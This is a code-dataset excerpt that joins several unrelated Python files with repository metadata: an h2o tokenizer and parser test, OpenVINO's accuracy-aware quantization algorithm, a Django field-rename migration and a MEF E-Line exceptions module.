    check_code("""
        def foo():
            # Attempt to create the output directory
            try:
                os.makedirs(destdir)
            except OSError as e:
                raise
        """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
              OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
              NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
              NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
    check_code("""
        if PY2:
            def unicode():
                raise RuntimeError # disable this builtin function
                # because it doesn't exist in Py3
        handler = lambda: None # noop
        # (will redefine later)
        ################################################################################
        # comment 1
        print("I'm done.")
        """, [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
              OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
              DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
              COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
    check_code("""
        def test3():
            x = 1
            # bad
            print(x)
        """, [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
              NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
    check_code("""
        class Foo(object):
            #-------------
            def bar(self):
                if True:
                    pass
        # Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
        # all the way up across multiple comments.
        # comment 3
        # commmmmmmment 4
        @decorator
        """, [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
              COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
              NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
              DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
              NL, OP("@"), NAME("decorator"), NEWLINE, END])
    # Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
    # the stream.
    check_code("""
        if True:
            if False:
                # INDENT will be inserted before this comment
                raise
            # DEDENT will be after this comment
        else:
            praise()
        """, [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
              INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
              INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
    # Finally, run the round-trip check over every .py file that is reachable
    # from the current directory and the h2o-py source tree.
    for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
        absdir = os.path.abspath(directory)
        for dir_name, subdirs, files in os.walk(absdir):
            for f in files:
                if f.endswith(".py"):
                    filename = os.path.join(dir_name, f)
                    with open(filename, "rt", encoding="utf-8") as fff:
                        check_code(fff.read(), filename=filename)
def test_pyparser():
    """Test case: general parsing.

    Parses code fragments with ``pyparser.parse_text``, verifies that unparsing
    reproduces the original source, and (optionally) that the sequence of
    parsed block objects matches an expected list of block classes / types.
    """
    def _check_blocks(actual, expected):
        """Compare parsed blocks against expected classes or (class, type) pairs."""
        assert actual, "No parse results"
        for i in range(len(actual)):
            assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
            valid = False
            if isinstance(expected[i], type):
                if isinstance(actual[i], expected[i]): valid = True
            elif isinstance(expected[i], tuple):
                if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
            if not valid:
                assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
    def check_code(code, blocks=None, filename=None):
        """Parse ``code``, assert round-trip, and optionally check its block structure."""
        code = textwrap.dedent(code)
        if not code.endswith("\n"): code += "\n"
        if filename:
            print("Testing file %s..." % filename, end=" ")
        else:
            check_code.index = getattr(check_code, "index", 0) + 1
            print("Testing code fragment %d..." % check_code.index, end=" ")
        preparsed = None
        parsed = None
        unparsed = None
        try:
            preparsed = pyparser.parse_text(code)
            # Level-2 parse; meaning of the depth argument is defined by
            # pyparser (presumably parse granularity) -- see pyparser docs.
            parsed = preparsed.parse(2)
            try:
                unparsed = parsed.unparse()
            except ValueError as e:
                for i, tok in enumerate(parsed.tokens):
                    print("%3d %r" % (i, tok))
                raise AssertionError("Cannot unparse code: %s" % e)
            assert_same_code(code, unparsed)
            if blocks:
                _check_blocks(parsed.parsed, blocks)
            print("ok")
        except AssertionError as e:
            # Assertion failures: dump the fragment, the unparsed text and the
            # token stream to make the mismatch diagnosable, then re-raise.
            print()
            print(u"Error: " + str(e))
            print(u"Original code fragment:\n" + code)
            if unparsed: print(u"Unparsed code:\n" + unparsed)
            if parsed:
                print(parsed)
                for i, tok in enumerate(parsed.tokens):
                    print("%3d %r" % (i, tok))
            raise
        except Exception as e:
            # Any other failure: show whatever stage succeeded so far.
            print()
            print(u"Error: " + str(e))
            if preparsed:
                print("Preparsed tokens:")
                for i, tok in enumerate(preparsed.tokens):
                    print("%4d %r" % (i, tok))
            else:
                print("Initial parsing has failed...")
            raise
    # One large synthetic module exercising most block kinds recognized by
    # pyparser (comments, docstring, import groups, banner, class, decorated
    # function, commented-out code, trailing comment).
    check_code("""
        # -*- encoding: utf-8 -*-
        # copyright: 2016 h2o.ai
        \"\"\"
        A code example.
        It's not supposed to be functional, or even functionable.
        \"\"\"
        from __future__ import braces, antigravity
        # Standard library imports
        import sys
        import time
        import this
        import h2o
        from h2o import H2OFrame, init
        from . import *
        # Do some initalization for legacy python versions
        if PY2:
            def unicode():
                raise RuntimeError # disable this builtin function
                # because it doesn't exist in Py3
        handler = lambda: None # noop
        # (will redefine later)
        ################################################################################
        # comment 1
        class Foo(object):
            #------ Public -------------------------------------------------------------
            def bar(self):
                pass
            # def foo():
            # print(1)
            #
            # print(2)
        # comment 2
        @decorated(
            1, 2, (3))
        @dddd
        def bar():
            # be
            # happy
            print("bar!")
        # bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
                   Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
    # Round-trip check over every .py file reachable from these directories.
    for directory in [".", "../../h2o-py", "../../py"]:
        absdir = os.path.abspath(directory)
        for dir_name, subdirs, files in os.walk(absdir):
            for f in files:
                if f.endswith(".py"):
                    filename = os.path.join(dir_name, f)
                    with open(filename, "rt", encoding="utf-8") as fff:
                        check_code(fff.read(), filename=filename)
# Module entry point: run the parser test suite.
# The tokenization tests are currently disabled (commented out).
# test_tokenization()
test_pyparser()
| 38.702703 | 117 | 0.509777 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,055 | 0.384396 |
17e0d5e504ccaae3246c922d12121bf9759c86a5 | 29,139 | py | Python | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | chccc1994/openvino | 41f7893ae81d186d15c1754b179bf32a66d03bcf | [
"Apache-2.0"
] | 2,406 | 2020-04-22T15:47:54.000Z | 2022-03-31T10:27:37.000Z | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 4,948 | 2020-04-22T15:12:39.000Z | 2022-03-31T18:45:42.000Z | tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | thomas-yanxin/openvino | 031e998a15ec738c64cc2379d7f30fb73087c272 | [
"Apache-2.0"
] | 991 | 2020-04-23T18:21:09.000Z | 2022-03-31T18:40:57.000Z | # Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import random
from copy import deepcopy
from sys import maxsize
import numpy as np
from .utils import create_metric_config, is_preset_performance, \
get_mixed_preset_config, evaluate_model, get_num_of_quantized_ops
from ..utils import load_hardware_config
from ...algorithm import Algorithm
from ...algorithm_selector import COMPRESSION_ALGORITHMS
from ....algorithms.quantization import utils as eu
from ....graph import node_utils as nu
from ....graph.model_utils import save_model, get_nodes_by_type
from ....graph.transformer import GraphTransformer
from ....samplers.creator import create_sampler
from ....statistics.statistics import TensorStatistic
from ....utils.logger import get_logger
from ....utils.telemetry import send_event
logger = get_logger(__name__)
# pylint: disable=R0912
@COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')
class AccuracyAwareCommon(Algorithm):
name = 'AccuracyAwareCommon'
def __init__(self, config, engine):
super().__init__(config, engine)
# configure default parameters
default_config = {
'metric_subset_ratio': 0.5,
'ranking_subset_size': config.get('ranking_subset_size', min(len(engine.data_loader), 300)),
'max_iter_num': maxsize,
'maximal_drop': 0.01,
'drop_type': 'absolute',
'use_prev_if_drop_increase': True,
'base_algorithm': 'DefaultQuantization',
'annotation_free': False,
'tune_hyperparams': False,
'annotation_conf_threshold': 0.6,
'convert_to_mixed_preset': False
}
for setting in default_config:
if setting not in self._config:
self._config[setting] = default_config[setting]
self._config.convert_to_mixed_preset = self._config.convert_to_mixed_preset and \
is_preset_performance(self._config)
save_dir = self._config.get('exec_log_dir', os.path.curdir)
self._config.intermediate_log_dir = os.path.join(save_dir, 'accuracy_aware_intermediate')
self._engine.calculate_metrics = True
# Create initial quantization algorithms
self._quantization_algo = self._create_quantization_algo(self._config, 'AAQuantizationAlgorithm', self._engine)
self._preset_conversion_algo = self._create_quantization_algo(get_mixed_preset_config(self._config),
'AAConversionAlgorithm', self._engine)
self._grid_search_algo = COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config, engine)
self._grid_search_algo.default_algo = self._quantization_algo
# Configure metrics
self._metrics_config = create_metric_config(self._engine, self._config)
self._baseline_metric = {metric.name: metric.baseline_value
for metric in self._config.metrics
if metric.name in self._metrics_config} \
if self._config.metrics and \
all('baseline_value' in metric.keys() for metric in self._config.metrics) \
else {}
self._max_drop_by_name = {}
self._original_per_sample_metrics = None
self._output_node_name, self._stats_layout = None, None
self._quantized_layers_num = 0
self._dataset_size = len(self._engine.data_loader)
metric_subset_size = int(self._dataset_size * self._config.metric_subset_ratio)
self._diff_subset_indices = sorted(random.sample(range(self._dataset_size), metric_subset_size)) \
if metric_subset_size < self._dataset_size and self._baseline_metric \
else list(range(self._dataset_size))
self._graph_transformer = GraphTransformer(load_hardware_config(self._config))
self.default_steps_size = 0.005
self.total_exec_steps = self._config.get('stat_subset_size', self._dataset_size)
self._quantization_algo.default_steps_size = self.default_steps_size
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.default_steps_size = self.default_steps_size
self._stats_collector = None
self._precision_change_to = 'floating-point'
self._need_to_change_scope = True
self._change_conditions = None
self._exclude_bad_nodes = False
@property
def change_original_model(self):
return True
def register_statistics(self, model, stats_collector):
self._stats_collector = stats_collector
self._quantization_algo.register_statistics(model, stats_collector)
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.register_statistics(model, stats_collector)
if self._config.tune_hyperparams:
self._grid_search_algo.register_statistics(model, stats_collector)
def run(self, model):
""" this function applies the accuracy aware
quantization scope search algorithm
:param model: model to apply algo
:return model with modified quantization scope to match
required accuracy values
"""
if not self._metrics_config:
logger.info('Could not find the required metrics for optimization in the engine. '
'Stop AccuracyAware optimization. '
'Available metrics: %s.', ', '.join(self._engine.get_metrics_attributes()))
logger.update_progress(self.total_exec_steps)
return model
# configure stats layout to collect raw output
# to calculate persample difference for special metrics
self._output_node_name = nu.get_node_input(
model.get_final_output_nodes()[0], 0).name # gets first output node
for metric_config in self._metrics_config.values():
if metric_config.persample.is_special:
self._stats_layout = {self._output_node_name: {'output_logits': TensorStatistic(lambda a: a)}}
break
self._request_alt_statistics(model)
print_progress = logger.progress_bar_disabled
if not self._baseline_metric or self._config.annotation_free:
# collect predictions of original model
if self._config.annotation_free:
self._engine.dump_prediction_to_annotation = True
self._engine.annotation_conf_threshold = self._config.annotation_conf_threshold
self._baseline_metric, self._original_per_sample_metrics = self._collect_baseline(model, print_progress)
logger.info('Baseline metrics: %s', self._baseline_metric)
# update dataset info
if self._config.annotation_free:
self._dataset_size = len(self._engine.data_loader)
self._diff_subset_indices = list(range(self._dataset_size))
# configure values of metrics maximum drop
max_drop = self._config.maximal_drop
if self._config.drop_type == 'relative':
self._max_drop_by_name = {name: value * max_drop for name, value in self._baseline_metric.items()}
else:
self._max_drop_by_name = {name: max_drop for name, value in self._baseline_metric.items()}
# quantize model
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._quantize_model,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._quantization_algo.config
# change quantization preset of the model if possible
if self._config.convert_to_mixed_preset:
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._convert_model_to_mixed_preset,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._preset_conversion_algo.config
if not self._original_per_sample_metrics:
_, self._original_per_sample_metrics = \
self._evaluate_model(model=model, subset_indices=self._diff_subset_indices)
# change quantization parameters of the model
if self._config.tune_hyperparams:
worst_ranking_subset = self._create_hardest_ranking_subset(quantized_metrics_per_sample)
self._grid_search_algo.update_config(default_quantization_config)
self._grid_search_algo.set_subset_and_metric(worst_ranking_subset,
self._metrics_config)
self._engine.allow_pairwise_subset = True
updated_quantized_model, updated_metrics_accuracy_drop, updated_quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._search_optimal_parameters,
print_progress=print_progress)
default_mean_drop = np.mean([value for name, value in metrics_accuracy_drop.items()])
updated_mean_drop = np.mean([value for name, value in updated_metrics_accuracy_drop.items()])
if updated_mean_drop < default_mean_drop:
logger.info('Applying the best configuration')
quantized_model = updated_quantized_model
metrics_accuracy_drop = updated_metrics_accuracy_drop
quantized_metrics_per_sample = updated_quantized_metrics_per_sample
self._engine.allow_pairwise_subset = False
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
# we need to do this for more efficient memory consumption which is too high
# because _change_quantization_scope(..) will allocate one more model
del model
if self._need_to_change_scope:
return self._change_quantization_scope(quantized_model,
metrics_accuracy_drop,
quantized_metrics_per_sample)
logger.info('Quantization scope was not changed due to algo conditions: %s', self._change_conditions)
logger.update_progress(self.total_exec_steps)
return quantized_model
def _collect_baseline(self, model, print_progress):
logger.info('Start original model inference')
return self._evaluate_model(model=model,
print_progress=print_progress)
def _change_quantization_scope(self, model, original_accuracy_drop,
fully_quantized_metrics_per_sample):
"""Applies greedy search to remove fake-quantize nodes that degrade metric values
:param model: fully quantized model
:param original_accuracy_drop: dictionary of per-metric drops
of fully quantized model {metric_name: drop_value}
:param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values
of fully quantized model
:return model: model with new quantization scope
"""
self._quantized_layers_num = \
self._get_num_of_quantized_ops(model)
logger.info('The total number of quantized operations in the graph: %d', self._quantized_layers_num)
logger.info('Changing fake quantize nodes scope')
all_changed_nodes_names = []
all_ops_in_targeted_prec = set()
drop_functor = lambda a: (original_accuracy_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a]
metric_to_optimize = sorted(original_accuracy_drop.keys(), key=drop_functor)[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
# calculate importance of fq nodes
node_importance = self._get_node_importance(model,
metric_to_optimize,
fully_quantized_metrics_per_sample)
quantized_metrics_per_sample = None
reached_required_drop = False
changed_all_fq = False
is_step_back = True
iteration = 0
excluded_nodes = []
for iteration in range(self._config.max_iter_num):
# save model and metrics from previous iteration
model_prev_iter = deepcopy(model)
metrics_prev_iter = deepcopy(quantized_metrics_per_sample)
if not node_importance:
logger.info(
'All layers have been checked and the AccuracyAwareQuantization '
'will not be able to achieve the required accuracy drop')
changed_all_fq = True
break
# greedy removal of the FQ node with the highest importance score
fq_name_to_change = node_importance.pop(0)
model, changed_nodes, ops_in_targeted_prec = self._modify_model_in_scope(model,
[fq_name_to_change])
logger.debug('Changed a block of %d FQ layers: %s', len(changed_nodes), changed_nodes)
logger.info('Reverted %d layers to the %s precision: %s',
len(ops_in_targeted_prec), self._precision_change_to, ', '.join(ops_in_targeted_prec))
all_changed_nodes_names.append(str(changed_nodes))
all_ops_in_targeted_prec.update(ops_in_targeted_prec)
# save intermediate model
self._save_intermediate_model(model)
# calculate drop for new quantization scope
final_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=True)
metrics_accuracy_drop = {name: params.comparator(self._baseline_metric[name]
- final_metrics[name])
for name, params in self._metrics_config.items()}
new_accuracy_drop = metrics_accuracy_drop[metric_to_optimize]
logger.info('Accuracy drop with the new quantization scope is %s', metrics_accuracy_drop)
# removed all fake-quantize layers from the model
if not get_nodes_by_type(model, ['FakeQuantize']):
logger.info('Removed all FQ layers from the network!')
changed_all_fq = True
break
# all drop restrictions are met
if self._drop_restrictions_are_met(metrics_accuracy_drop):
reached_required_drop = True
break
# continue greedy fq removal
if self._max_drop_by_name[metric_to_optimize] < new_accuracy_drop <= accuracy_drop \
or (new_accuracy_drop > accuracy_drop and is_step_back):
is_step_back = False
accuracy_drop = new_accuracy_drop
continue
# if after fq removal drop has increased
# calculate node importance of the model (from previous iteration)
if new_accuracy_drop > accuracy_drop and self._config.use_prev_if_drop_increase:
model = model_prev_iter
quantized_metrics_per_sample = metrics_prev_iter
all_changed_nodes_names.remove(str(changed_nodes))
all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)
if self._exclude_bad_nodes:
excluded_nodes.extend(changed_nodes)
logger.debug('%s added to excluded list: %s', str(changed_nodes), str(excluded_nodes))
is_step_back = True
accuracy_drop = new_accuracy_drop
# if drop restriction for the current metric is satisfied, select the next metric
# and calculate node importance
if new_accuracy_drop <= self._max_drop_by_name[metric_to_optimize]:
metric_to_optimize = sorted(original_accuracy_drop.keys(),
key=lambda a, current_drop=metrics_accuracy_drop:
(current_drop[a] - self._max_drop_by_name[a]) /
self._baseline_metric[a])[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
is_step_back = False
del model_prev_iter, metrics_prev_iter
logger.info('Re-calculating node importance')
node_importance = self._get_node_importance(model,
metric_to_optimize,
quantized_metrics_per_sample,
excluded_nodes)
if changed_all_fq or not reached_required_drop:
# Do not remove or change!
logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.',
force=True)
if iteration + 1 >= self._config.max_iter_num:
logger.info('Reached maximum number of iterations.')
if not changed_all_fq:
logger.debug('Changed FakeQuantize nodes:\n %s', '\n'.join(all_changed_nodes_names))
logger.info(' %d out of %d layers have been reverted back to the %s precision: %s',
len(all_ops_in_targeted_prec), self._quantized_layers_num, self._precision_change_to,
', '.join(all_ops_in_targeted_prec))
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, len(all_ops_in_targeted_prec)))
logger.update_progress(self.total_exec_steps)
return model
def _get_node_importance(self, model, metric_name, qmodel_per_sample_metrics=None, excluded_nodes=None):
"""Creates a list of fake-quantize nodes importance in descending order
based on their contribution to metric degradation
:param model: model with fake-quantize nodes
:param metric_name: metric to be taken into consideration
:param qmodel_per_sample_metrics: per-sample metrics values of quantized model
:return list of node names
"""
if qmodel_per_sample_metrics is None:
# get quantized model predictions
_, qmodel_per_sample_metrics = self._evaluate_model(model=model,
subset_indices=self._diff_subset_indices)
ranking_subset = self._get_ranking_subset(qmodel_per_sample_metrics, metric_name) # not sorted
node_importance_score = self._calculate_node_importance_scores(model,
ranking_subset,
metric_name,
excluded_nodes)
# sort by error value and then by node name
node_importance = sorted(node_importance_score.items(), key=lambda x: (x[1], x[0]), reverse=True)
node_importance = [n[0] for n in node_importance]
return node_importance
def _get_ranking_subset(self, qmodel_per_sample_metrics, metric_name, from_id=0):
"""Determines samples on which the quantized model predicts worse than on the original model
:param qmodel_per_sample_metrics: per-sample metrics values of the quantized model
:param metric_name: metric to take into account
:return a list of image ids
"""
persample_metric = self._metrics_config[metric_name].persample
sorted_sample_importance = \
persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name],
qmodel_per_sample_metrics[persample_metric.name],
reverse=True)
to_id = from_id + self._config.ranking_subset_size
ranking_subset = \
np.array(self._diff_subset_indices)[sorted_sample_importance[from_id:to_id]]
return ranking_subset
def _calculate_node_importance_scores(self, model, ranking_subset, metric_name, excluded_nodes=None):
"""Cuts out FQ layers one after another and measures metric value on ranking subset.
The higher the value, the more important the node.
:param model: graph from which to cut nodes
:param ranking_subset: subset on which the scores will be calculated
:param metric_name: metric to take into account
:return a dictionary of node importance {metric_name: score}
"""
change_fqs = []
node_importance_score = {}
eu.select_evaluation_dataset(self._engine)
fake_quantize_nodes = get_nodes_by_type(model, ['FakeQuantize'])
for node in fake_quantize_nodes:
if excluded_nodes and node.name in excluded_nodes:
continue
if node.name not in change_fqs:
modified_model, modified_fq_layers, _ = self._modify_model_in_scope(deepcopy(model), [node.name])
if not modified_fq_layers:
continue
logger.debug('Changed\\Removed a block of %d FQ layers: %s', len(modified_fq_layers),
modified_fq_layers)
change_fqs += modified_fq_layers
self._engine.set_model(modified_model)
self._engine.allow_pairwise_subset = True
index_sampler = create_sampler(self._engine, samples=list(ranking_subset))
metrics, *_ = self._engine.predict(sampler=index_sampler)
self._engine.allow_pairwise_subset = False
logger.update_progress(self._config.ranking_subset_size)
ranking_metric = self._metrics_config[metric_name].ranking
node_importance_score[node.name] = ranking_metric.comparator(metrics[ranking_metric.name])
eu.reset_dataset_to_default(self._engine)
return node_importance_score
def _modify_model_in_scope(self, model, nodes_names):
return self._graph_transformer.remove_fq_nodes(deepcopy(model), nodes_names)
def compute_total_exec_steps(self, model=None):
total_steps = 0
# add dataset_size to total if baseline not implemented
if not self._baseline_metric or self._config.annotation_free:
total_steps += self._dataset_size
# add dataset_size to total for int8 inference
total_steps += self._dataset_size
# add dataset_size to total in case of conversion to mixed mode
if self._config.convert_to_mixed_preset:
total_steps += self._dataset_size
nodes_length = len(get_nodes_by_type(model, ['Convolution', 'MatMul']))
num_steps = self._config['max_iter_num'] if self._config['max_iter_num'] < maxsize else nodes_length
metric_computing_steps = nodes_length * self._config['ranking_subset_size']
# add ranking_subset_size for num_steps and again computing every 3 steps
total_steps += metric_computing_steps + \
metric_computing_steps * self._config['ranking_subset_size'] * num_steps / 3
# add total run steps (num steps) without one of FQs pairs
total_steps += num_steps * self._dataset_size
# number of statistics computing
total_steps += self._quantization_algo.total_exec_steps
if self._config.convert_to_mixed_preset:
total_steps += self._preset_conversion_algo.total_exec_steps
self.total_exec_steps = total_steps
def _convert_model_to_mixed_preset(self, model):
logger.info('Start quantization in mixed mode')
return self._preset_conversion_algo.run(model)
def _quantize_model(self, model):
logger.info('Start quantization')
return self._quantization_algo.run(model)
def _search_optimal_parameters(self, model):
logger.info('Start parameters grid search')
return self._grid_search_algo.run(model)
def _quantize_and_evaluate(self, model, quantization_algo, print_progress=True):
def calculate_accuracy_drop():
return {metric_name: params.comparator(self._baseline_metric[metric_name]
- quantized_metrics[metric_name])
for metric_name, params in self._metrics_config.items()}
quantized_model = quantization_algo(model)
logger.info('Start compressed model inference')
quantized_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=quantized_model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=print_progress)
logger.info('Fully quantized metrics: %s', quantized_metrics)
metrics_accuracy_drop = calculate_accuracy_drop()
logger.info('Accuracy drop: %s', metrics_accuracy_drop)
return quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample
def _drop_restrictions_are_met(self, metrics_accuracy_drop):
return all(metrics_accuracy_drop[name] <= self._max_drop_by_name[name]
for name in self._metrics_config)
def _save_intermediate_model(self, model):
save_model(model,
self._config.intermediate_log_dir,
model_name='intermediate_model')
logger.debug('Intermediate model is saved in %s', self._config.intermediate_log_dir)
def _create_hardest_ranking_subset(self, metrics_per_sample):
worst_ranking_subset = []
while len(worst_ranking_subset) < self._config.ranking_subset_size:
needed_subset_size = self._config.ranking_subset_size - len(worst_ranking_subset)
top_n_samples = int(np.ceil(needed_subset_size / len(metrics_per_sample.keys())))
local_ranking_subset = []
for metric_name in metrics_per_sample:
ranking_subset = self._get_ranking_subset(metrics_per_sample, metric_name, len(worst_ranking_subset))
local_ranking_subset.extend(ranking_subset[:top_n_samples])
worst_ranking_subset.extend(list(set(local_ranking_subset)))
return list(set(worst_ranking_subset))
    def _evaluate_model(self, model, per_sample_subset_indices=None,
                        subset_indices=None, print_progress=True):
        """Evaluate *model* on the engine and advance the progress indicator.

        :param per_sample_subset_indices: indices for which per-sample metrics
            are collected (may be None)
        :param subset_indices: restrict evaluation to a dataset subset; when
            None the full dataset is used
        :return: tuple (aggregated metrics, per-sample metrics)
        """
        metrics, metrics_per_sample = evaluate_model(model, self._engine, self._dataset_size,
                                                     subset_indices, print_progress, self._metrics_config,
                                                     per_sample_subset_indices, self._output_node_name,
                                                     self._stats_layout)
        # Progress advances by the number of samples actually inferred.
        predict_step_size = self._dataset_size if not subset_indices else len(subset_indices)
        logger.update_progress(predict_step_size)
        return metrics, metrics_per_sample
    def _request_alt_statistics(self, model):
        """Hook for collecting additional statistics; intentionally a no-op here."""
        pass
    def _get_num_of_quantized_ops(self, model):
        """Count the operations in *model* that the graph transformer quantizes."""
        return get_num_of_quantized_ops(model, self._graph_transformer.fq_removal.quantize_operations)
@staticmethod
def _get_result_aa(metrics_accuracy_drop, num_of_reverted_layers):
try:
return str({'final_drop': dict(metrics_accuracy_drop),
'num_of_reverted_layers': num_of_reverted_layers})
except Exception as e: # pylint: disable=broad-except
logger.info("Error occurred while trying to send telemetry. Details:" + str(e))
return str(None)
    @staticmethod
    def _create_quantization_algo(algo_config, name, engine):
        """Instantiate the registered base quantization algorithm and tag it
        with *name* so it can be identified later."""
        algo = COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config, engine)
        algo.name = name
        return algo
| 52.408273 | 119 | 0.651601 | 28,187 | 0.967329 | 0 | 0 | 28,243 | 0.969251 | 0 | 0 | 5,575 | 0.191324 |
17e137bb0de594618d6979cb258b74fc8c2fc07c | 353 | py | Python | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | Django-React/exemple/api/migrations/0002_rename_created_app_room_created_at.py | S-c-r-a-t-c-h-y/coding-projects | cad33aedb72720c3e3a37c7529e55abd3edb291a | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-07-03 21:26
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: rename Room.created_app to created_at."""

    dependencies = [
        ('api', '0001_initial'),
    ]
    operations = [
        migrations.RenameField(
            model_name='room',
            old_name='created_app',
            new_name='created_at',
        ),
    ]
| 18.578947 | 45 | 0.575071 | 270 | 0.764873 | 0 | 0 | 0 | 0 | 0 | 0 | 95 | 0.269122 |
17e1d0ca3e2d0f35d168ba0274703631eff3ed3a | 417 | py | Python | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 1 | 2021-12-09T17:09:33.000Z | 2021-12-09T17:09:33.000Z | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 171 | 2021-06-02T20:29:22.000Z | 2022-03-18T17:47:57.000Z | exceptions.py | italovalcy/mef_eline | 230d2bb44b1506adc9900157ca09e920fb37b002 | [
"MIT"
] | 3 | 2021-06-15T18:55:52.000Z | 2021-10-01T14:47:10.000Z | """MEF Eline Exceptions."""
class MEFELineException(Exception):
    """Root of the MEF E-Line exception hierarchy."""
class EVCException(MEFELineException):
    """Raised for EVC-related errors."""
class ValidationException(EVCException):
    """Raised when EVC validation fails."""
class FlowModException(MEFELineException):
    """Raised when a FlowMod operation fails."""
class InvalidPath(MEFELineException):
    """Raised when a requested path is invalid."""
| 18.954545 | 42 | 0.717026 | 374 | 0.896882 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.441247 |
17e22362c78802f14ab902ca7c186827af89b8a5 | 4,724 | py | Python | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | null | null | null | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | null | null | null | stack.py | Shahadate-Rezvy/Samon_EXplainer | 2ac4a55c06d4ea90cb38dae27e24f7945415a2b6 | [
"MIT"
] | 1 | 2021-11-04T09:44:56.000Z | 2021-11-04T09:44:56.000Z | import numpy as np
